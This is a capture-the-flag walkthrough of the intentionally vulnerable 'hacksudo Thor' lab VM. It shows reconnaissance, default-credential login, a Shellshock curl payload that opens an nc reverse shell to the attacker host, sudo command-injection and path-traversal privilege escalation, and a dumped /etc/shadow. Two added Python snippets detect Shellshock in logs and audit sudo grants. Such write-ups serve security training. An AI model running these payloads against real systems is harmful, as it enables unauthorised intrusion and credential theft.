Target machine: hacksudo---Thor

Preparation

Walkthrough

Target discovery

Using the usual tools:

  • arp-scan
  • nmap
  • netdiscover
  • fping

Initial scan: sudo arp-scan -l -I eth1

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
[sudo] kali 的密码:
Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:bf:0e:ee PCS Systemtechnik GmbH
192.168.56.121 08:00:27:56:af:01 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.182 seconds (117.32 hosts/sec). 3 responded

Port-scan the discovered IP with nmap: nmap -A -T4 192.168.56.121

┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.121
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-02 20:35 CST
Nmap scan report for 192.168.56.121
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 3736603e26ae233fe18b5d18e7a7c7ce (RSA)
| 256 349a57607d6670d5b5ff4796e0362375 (ECDSA)
|_ 256 ae7deefe1dbc994d54453d6116f86c87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
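Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.66 seconds

  • 22/tcp: the classic SSH service
  • 80/tcp: the equally classic HTTP service
  • The operating system is Debian

Information gathering

Let's visit http://192.168.56.121:80/

  • http://192.168.56.121/home.php is the login page; there is not enough information yet, but the system appears to be a bank management system
  • http://192.168.56.121/news.php: part of it is the bank's news or announcements
  • http://192.168.56.121/contact.php: the information here can be collected and may serve as wordlist material later
  • http://192.168.56.121/contact.php#about: nothing visible

Reading the source of the pages above

  • http://192.168.56.121/home.php contains two pieces of JavaScript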

    function respFunc() {
        var x = document.getElementById("theTopNav");
        console.log(x);
        if (x.className === "topnav") {
            x.className += " responsive";
            return 0;
        }
        if (x.className === "topnav navbar-fixed") {
            x.className += " responsive";
            return 0;
        }
        if (x.className === "topnav responsive") {
            x.className = "topnav";
            return 0;
        }
        if (x.className === "topnav navbar-fixed responsive" || x.className === "topnav responsive navbar-fixed") {
            x.className = "topnav navbar-fixed";
            return 0;
        }
    }

    // Function below is jquery-3 function used for making the navbar sticky
    $(document).ready(function() {
        $(window).scroll(function () {
            if ($(window).scrollTop() > 120) {
                $("#theTopNav").addClass('navbar-fixed');
            }
            if ($(window).scrollTop() < 121) {
                $("#theTopNav").removeClass('navbar-fixed');
            }
        });
    });

    var old_time = 0;
    var count = 1;
    var eEgg_flag = false;
    var modal = document.getElementById('eEgg_modal');
    var footer = document.getElementById('footer');

    function eEgg_func(){
        var d = new Date();
        var n = d.getTime();
        var new_time = Math.ceil(n/1000);
        if ((new_time - old_time) <= 1) {
            count++;
        }
        else {
            count = 1;
        }
        old_time = new_time;
        if (count > 7 && !eEgg_flag) {
            modal.style.display = "block";
            eEgg_flag = true;
            // Timeout
            setTimeout(function () {
                modal.style.display = "none";
            }, 21000);
            //Timeout text display in the footer
            var now = new Date().getTime();
            var countDownDate = now + 21000;
            setInterval(function() {
                // Get todays date and time
                var now = new Date().getTime();
                // Find the distance between now an the count down date
                var distance = countDownDate - now;
                // Time calculations for seconds
                var seconds = Math.floor((distance % (1000 * 60)) / 1000);
                // Display the result in the element with id="demo"
                document.getElementById("footer").innerHTML =
                    "Going back in "+ seconds + "s...";
            }, 1000);
        }
    }
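    • These do some simple checks on the login page's content
  • http://192.168.56.121/news.php contains a comment suggesting that the page may use CGI

    <!-- cgi-bin ---!>
    • CGI is a specification for external programs run by a web server; programs written to it can extend the server's functionality
    • A CGI application can interact with the browser, and can also talk to external data sources such as a database server through the database API to fetch data from it
    • There should be a cgi-bin directory holding the related scripts

Nothing else is of interest, so the next step is directory brute-forcing: dirsearch -u http://192.168.56.121/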

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.56.121/
  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/192.168.56.121/-_22-12-02_21-02-33.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-12-02_21-02-33.log
Target: http://192.168.56.121/
[21:02:33] Starting:
[21:02:36] 403 - 279B - /.ht_wsr.txt
... ...
[21:02:38] 403 - 279B - /.php
[21:02:46] 200 - 4KB - /README.md
[21:03:06] 200 - 1KB - /admin_login.php
[21:03:09] 302 - 7KB - /admin_home.php -> home.php
[21:03:29] 403 - 279B - /cgi-bin/
[21:03:35] 200 - 4KB - /contact.php
[21:03:51] 301 - 316B - /fonts -> http://192.168.56.121/fonts/
[21:03:54] 200 - 472B - /header.php
[21:03:56] 200 - 5KB - /home.php
[21:03:58] 200 - 4KB - /images/
[21:03:58] 301 - 317B - /images -> http://192.168.56.121/images/
[21:04:00] 200 - 5KB - /index.php
[21:04:00] 200 - 5KB - /index.php/login/
[21:04:26] 200 - 8KB - /news.php
[21:04:59] 403 - 279B - /server-status
[21:05:00] 403 - 279B - /server-status/
Task Completed

  • An interesting file: /README.md

Looking at its contents, it holds a lot of interesting information

## Disclaimer
<b><i>This project should not be modified in any way and used anywhere else without my permission.</b></i>
If you use this project for phishing purposes after modifying the source code / or by any other means, remember that the original project has nothing to do with phishing or any other malicious purpose. Any loss of data or unauthorized access which happened because of such phishing kits would not be my responsibility as that is not my original code. Strict legal action would be taken if someone is found modifying it and using it for any unethical purpose.

# Online Banking System
A web based banking system with all essential features and security accompanied by a beautiful and simple website. The website is designed in accordance with google material design and resposive web design guidelines to ensure a seamless experience between devices. A fictional name of "Dolphin Bank" has been used only for representative purposes.

## Built with
<b>HTML5, CSS, JavaScript</b> & <b>jQuery</b> used for front-end design. <b>PHP7 & MySQL</b> used for back-end design. <b>Oracle MySQL</b> has been used to create and host the database for the
internet banking website. Other than the languages/tools mentioned above <b>no</b> other/external
libraries and/or web-page templates have been used, everything has been
coded from ground-up straight from scratch.

## How to build/use
Setup an environment which supports web development like <b>LAMP</b> on <b>Linux</b> systems OR install <b>WampServer/XAMPP</b> or anything similar on <b>Windows</b>. Copy the folder [net-banking](https://github.com/zakee94/online-banking-system/tree/master/net-banking) or the files in it to the location of the localhost. For example "/var/www/html", the loaction of localhost in Ubuntu. Import the [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql) database into your MySQL setup. Edit the file [connect.php](https://github.com/zakee94/online-banking-system/blob/master/net-banking/connect.php) and give proper username and password of your MySQL setup. Open a browser and test wether the setup works or not by visiting the home page. Type "localhost/home.php" as the URL in the browser to visit the home page. All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql). However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".

Some useful links to help in proper setup :
* [Installing LAMP](https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu-14-04)
* [WampServer](http://www.wampserver.com/en/)
* [Importing database in MySQL](https://www.digitalocean.com/community/tutorials/how-to-import-and-export-databases-and-reset-a-root-password-in-mysql)

## Details about the project
An exhaustive list of features, documentation, design hierarchy, details about the web pages, database, design characterstics/features and a lot more can be found [here](https://drive.google.com/open?id=1Px2shjcmyLUv7-u5wp93HvKT_zvw-Pmk). The ER Diagram can also be found on the link given above or can be viewed [here](https://drive.google.com/open?id=1Tn2fBR9IjLP8dlv6svrc4aEvryrYcI3G).

## Description of the various folders
- <b>/net-banking :</b> Contains the source code of the website
- <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website
- <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website

## Screenshots (more can be found [here](https://drive.google.com/open?id=1bLLNyEiVGoWgHDfOehGooYSAZUNtj85F))
![](https://drive.google.com/uc?id=1XAImOcjlkVbGv3OVcLtfZJKIG4jIh9D_) ![](https://drive.google.com/uc?id=1wPAlZ-QhjwOJMP4L7Bi7kEGbmcLS3Qaa)

## Authors
* [zakee94](https://github.com/zakee94/)

  • Technologies used: HTML5, CSS, JavaScript, jQuery, PHP7, MySQL, Oracle MySQL

  • Some default configuration, including the username and password patterns, and the existence of the important file net_banking.sql

    All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql]
    However some important usernames and passwords are provided below :
    * Username of admin is "admin" & password is "password123".
    * Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".
  • Potential directories; visiting /net-banking shows that the application does not restrict directory listing (Index of)

    ## Description of the various folders
    - <b>/net-banking :</b> Contains the source code of the website
    - <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website
    - <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website
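  • A more ruthless and aggressive approach is to read through the project at https://github.com/zakee94/online-banking-system

Important files extracted from it

  • The net-banking directory
  • net_banking.sql, the database imported into the MySQL setup; all admin and customer usernames and passwords can be found in it
  • connect.php
  • Credentials: admin password123

Trying the username and password

  • /admin_login.php
  • /home.php

Login succeeds at /admin_login.php, and after logging in:

  • http://192.168.56.121/customer_add.php has an obvious SQL injection vulnerability
  • http://192.168.56.121/manage_customers.php directly lists four accounts' information and also has an obvious SQL injection vulnerability
  • Combining this with the SQL layout in https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql would make the attack more effective, but that is not needed for now because we are already the administrator. Below is the net_banking.sql fragment that matches the four accounts; we can already control money transfers
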
INSERT INTO `customer` VALUES
(1,'Nafees','Zakee','male','1994-11-28',123456789,'zakee.nafees@gmail.com','+91 8918722499','22/10, Secondary Road, Durgapur - 713204','delhi',1122334455,1234,'zakee94','nafees123'),
(2,'Md Salman','Ali','male','1994-10-11',987654321,'ali.salman@gmail.com','+966 895432167','Al Ahsa Street Malaz, King Abdulaziz Rd, Alamal Dist. RIYADH 12643-2121.','riyadh',1133557788,1234,'salman','salman123'),
(3,'Tushar','Kr. Pandey','male','1995-02-03',125656765,'tusharpkt@gmail.com','+334 123456987','Champ de Mars, \r\n5 Avenue Anatole France, \r\n75007 Paris, France','paris',1122338457,1357,'tushar','tushar123'),
(4,'Jon','Snow','male','1985-02-03',129156787,'jon.snow@gmail.com','+1 8918332797','The Night Watch,\r\nKing in the North,\r\nThe North Remembers,\r\nWesteros.','newyork',1233556739,1234,'jon','snow123');

Next, we go back to /cgi-bin/ and brute-force it with dirsearch -u http://192.168.56.121/cgi-bin/ -f -e cgi,sh

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.56.121/cgi-bin/ -f -e cgi,sh
  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )
Extensions: cgi, sh | HTTP method: GET | Threads: 30 | Wordlist size: 16514
Output File: /home/kali/.dirsearch/reports/192.168.56.121/-cgi-bin-_22-12-02_22-05-06.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-12-02_22-05-06.log
Target: http://192.168.56.121/cgi-bin/
[22:05:07] Starting:
[22:05:11] 403 - 279B - /cgi-bin/.ht_wsr.txt
[22:05:11] 403 - 279B - /cgi-bin/.htaccess.bak1
[22:05:11] 403 - 279B - /cgi-bin/.htaccess.save
[22:05:11] 403 - 279B - /cgi-bin/.htaccess.orig
[22:05:11] 403 - 279B - /cgi-bin/.htaccess.sample
[22:05:11] 403 - 279B - /cgi-bin/.htpasswds
[22:05:11] 403 - 279B - /cgi-bin/.htaccess_extra
[22:05:11] 403 - 279B - /cgi-bin/.htaccessOLD2
[22:05:11] 403 - 279B - /cgi-bin/.htpasswd_test
[22:05:11] 403 - 279B - /cgi-bin/.htaccess_sc
[22:05:11] 403 - 279B - /cgi-bin/.htaccessOLD
[22:05:11] 403 - 279B - /cgi-bin/.html
[22:05:11] 403 - 279B - /cgi-bin/.htaccessBAK
[22:05:11] 403 - 279B - /cgi-bin/.httr-oauth
[22:05:11] 403 - 279B - /cgi-bin/.htaccess_orig
[22:05:11] 403 - 279B - /cgi-bin/.htm
[22:05:14] 403 - 279B - /cgi-bin/.php
[22:06:32] 500 - 612B - /cgi-bin/backup.cgi
[22:08:56] 500 - 612B - /cgi-bin/shell.sh
Task Completed

A 500 is clearly a server-side error; this usually happens when the submitted parameters are wrong

  • /cgi-bin/backup.cgi
  • /cgi-bin/shell.sh

We use nmap to verify our idea: nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.56.121

┌──(kali㉿kali)-[~]
└─$ nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.56.121 1 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-02 22:15 CST
Nmap scan report for 192.168.56.121
Host is up (0.00090s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| Exploit results:
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>500 Internal Server Error</title>
| </head><body>
| <h1>Internal Server Error</h1>
| <p>The server encountered an internal error or
| misconfiguration and was unable to complete
| your request.</p>
| <p>Please contact the server administrator at
| webmaster@localhost to inform them of the time this error occurred,
| and the actions you performed just before this error.</p>
| <p>More information about this error may be available
| in the server error log.</p>
| <hr>
| <address>Apache/2.4.38 (Debian) Server at 192.168.56.121 Port 80</address>
| </body></html>
|
| References:
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| http://seclists.org/oss-sec/2014/q3/685
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_http-server-header: Apache/2.4.38 (Debian)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds

  • The Shellshock vulnerability (CVE-2014-6271) is definitely present
  • Testing /cgi-bin/shell.sh shows it is affected as well
  • The output above also indicates how it can be exploited
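
How such requests look from the server side, as an added example that is not part of the original walkthrough: a Python scan of an Apache combined-format access log for header values that begin with the bash function-definition prefix abused by CVE-2014-6271. The log lines are constructed, and the combined log format is an assumption about this server's configuration.

```python
import re

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# A vulnerable bash imports a function from any environment value that starts
# with "() {". CGI copies request headers into the environment, so a header
# value starting with that prefix is the signature, whatever command follows.
FUNC_PREFIX = re.compile(r'\s*\(\s*\)\s*\{')

# Constructed sample log. The first flagged User-Agent is the probe shown on
# this page; the Referer variant, timestamps, statuses and sizes are made up.
SAMPLE_LOG = r"""
192.168.56.116 - - [02/Dec/2022:22:06:32 +0800] "GET /cgi-bin/backup.cgi HTTP/1.1" 500 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.56.116 - - [02/Dec/2022:22:20:11 +0800] "GET /cgi-bin/backup.cgi HTTP/1.1" 200 13 "-" "() { :; }; echo; echo; /bin/bash -c 'which nc'"
192.168.56.116 - - [02/Dec/2022:22:21:40 +0800] "GET /news.php HTTP/1.1" 200 8192 "() { :;}; /bin/true" "curl/7.86.0"
192.168.56.1 - - [02/Dec/2022:22:23:00 +0800] "GET /home.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; ExampleBot/1.0)"
"""


def find_shellshock(lines):
    """Return one finding per log line whose Referer or User-Agent value
    starts with a bash function definition."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not a combined-format line
        tainted = sorted(k for k in ("referer", "agent")
                         if FUNC_PREFIX.match(m.group(k)))
        if not tainted:
            continue
        parts = m.group("request").split()
        path = parts[1].split("?", 1)[0] if len(parts) >= 2 else ""
        hits.append({
            "host": m.group("host"),
            "time": m.group("time"),
            "path": path,
            "status": int(m.group("status")),
            "fields": tainted,
            # CGI scripts receive headers as environment variables,
            # so hits on them rank highest.
            "cgi": path.startswith("/cgi-bin/"),
        })
    return hits


if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG.strip().splitlines()):
        level = "HIGH" if h["cgi"] else "probe"
        print(f'{level:5} {h["time"]} {h["host"]} {h["path"]} '
              f'via {",".join(h["fields"])} -> {h["status"]}')
```

The combined format records only Referer and User-Agent; the same prefix sent in other headers is visible only if the LogFormat records them or a WAF/IDS inspects the request.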

We use curl http://192.168.56.121/cgi-bin/backup.cgi -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'"

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.56.121/cgi-bin/backup.cgi -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'"
/usr/bin/nc

  • It is indeed present

First start nc -nvlp 4444, then use curl http://192.168.56.121/cgi-bin/backup.cgi -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 192.168.56.116 4444'"

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.56.116] from (UNKNOWN) [192.168.56.121] 33482
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade the shell with python3 -c 'import pty;pty.spawn("/bin/bash")'

Account privilege escalation

First check the sudo configuration with sudo -l

bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on HackSudoThor:
(thor) NOPASSWD: /home/thor/./hammer.sh

  • We can run /home/thor/./hammer.sh unconditionally

Inputs to /home/thor/./hammer.sh

bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key :

  • Input is required

Enter anything and continue testing

bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key : id
id
Hey Dear ! I am id , Please enter your Secret massage : id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
Thank you for your precious time!
bash-4.3$

  • The content of the second input is executed as a command
  • And the command runs as thor

So replacing the id we entered with bash gives us thor's shell

HELLO want to talk to Thor?

id
bash
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
python3 -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/usr/lib/cgi-bin$

Check thor's sudo configuration

thor@HacksudoThor:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thor may run the following commands on HackSudoThor:
(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service

  • There are two commands that run with root privileges: /usr/bin/cat and /usr/sbin/service

We can read /etc/shadow

thor@HacksudoThor:/usr/lib/cgi-bin$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:$6$1YV0h.2rYTAvcB.o$cLPgAevmbnBo8dtADheWYcIfGLg157gfrCzZsKqv268MDkimBW7JcnQK6sI79fXsa1Hm5GmP8Kni05w.2nJfc0:18838:0:99999:7:::
daemon:*:18789:0:99999:7:::
bin:*:18789:0:99999:7:::
sys:*:18789:0:99999:7:::
sync:*:18789:0:99999:7:::
games:*:18789:0:99999:7:::
man:*:18789:0:99999:7:::
lp:*:18789:0:99999:7:::
mail:*:18789:0:99999:7:::
news:*:18789:0:99999:7:::
uucp:*:18789:0:99999:7:::
proxy:*:18789:0:99999:7:::
www-data:*:18789:0:99999:7:::
backup:*:18789:0:99999:7:::
list:*:18789:0:99999:7:::
irc:*:18789:0:99999:7:::
gnats:*:18789:0:99999:7:::
nobody:*:18789:0:99999:7:::
_apt:*:18789:0:99999:7:::
systemd-timesync:*:18789:0:99999:7:::
systemd-network:*:18789:0:99999:7:::
systemd-resolve:*:18789:0:99999:7:::
systemd-coredump:!!:18789::::::
messagebus:*:18789:0:99999:7:::
sshd:*:18789:0:99999:7:::
mysql:!:18790:0:99999:7:::
ftpuser:!:18793:0:99999:7:::
thor:$6$W4fXVS7OotxxqyVR$VP6iBANtcJIBt5.eI6qHFH1ho.xTtsISGiKj2uRkc.DH1NfPw54FImt28S8rKpn0PhlfHL3VYSAVNmZWws98X1:18838:0:99999:7:::
thor@HacksudoThor:/usr/lib/cgi-bin$

  • We can see root's password hash directly and could crack it, but that is inefficient

In fact /usr/sbin/service is the fatal one; we use sudo service ../../bin/bash

thor@HacksudoThor:/usr/lib/cgi-bin$ sudo service ../../bin/bash
sudo service ../../bin/bash
bash-4.3# id
id
uid=0(root) gid=0(root) groups=0(root)
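
The two `sudo -l` listings in this section can be audited mechanically. The following Python is an added example, not part of the original walkthrough: it parses that output and flags the grants that led to thor and then to root. The RISKY table and the /home/ rule are assumptions chosen for this page, not a complete policy.

```python
import posixpath
import re

# Commands granted on this page and why each grant is broader than it looks.
# Illustrative entries for this example, not a complete catalogue.
RISKY = {
    "/usr/bin/cat": "reads any file as the run-as user, including /etc/shadow",
    "/usr/sbin/service": "accepts ../ in the service name, so it can start any executable",
}

USER_LINE = re.compile(r"User (\S+) may run the following commands")
RULE_LINE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")

# The two `sudo -l` listings from this walkthrough (Defaults lines abridged).
WWW_DATA = r"""
Matching Defaults entries for www-data on HackSudoThor:
User www-data may run the following commands on HackSudoThor:
    (thor) NOPASSWD: /home/thor/./hammer.sh
"""
THOR = r"""
Matching Defaults entries for thor on HackSudoThor:
User thor may run the following commands on HackSudoThor:
    (root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
"""


def audit_sudo_l(text):
    """Parse `sudo -l` output and return the grants that need review."""
    findings, user = [], None
    for line in text.splitlines():
        u = USER_LINE.search(line)
        if u:
            user = u.group(1)
            continue
        m = RULE_LINE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m.group("tags")
        # Commands containing an escaped comma (\,) are not handled here.
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            argv = cmd.split()
            # /home/thor/./hammer.sh -> /home/thor/hammer.sh
            binary = posixpath.normpath(argv[0])
            reasons = []
            if binary == "ALL":
                reasons.append("unrestricted: every command is allowed")
            if binary in RISKY:
                reasons.append(RISKY[binary])
            if binary.startswith("/home/"):
                reasons.append("script in a home directory: its owner controls "
                               "what runs, and sudo cannot see what it does with input")
            if reasons and len(argv) == 1 and binary != "ALL":
                reasons.append("no argument restriction in the rule")
            if reasons:
                findings.append({"user": user, "runas": runas, "nopasswd": nopasswd,
                                 "command": binary, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(WWW_DATA) + audit_sudo_l(THOR):
        tag = "NOPASSWD" if f["nopasswd"] else "PASSWD"
        print(f'{f["user"]} -> {f["runas"]} [{tag}] {f["command"]}: {"; ".join(f["reasons"])}')
```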

And with that, we are done. GAME OVER
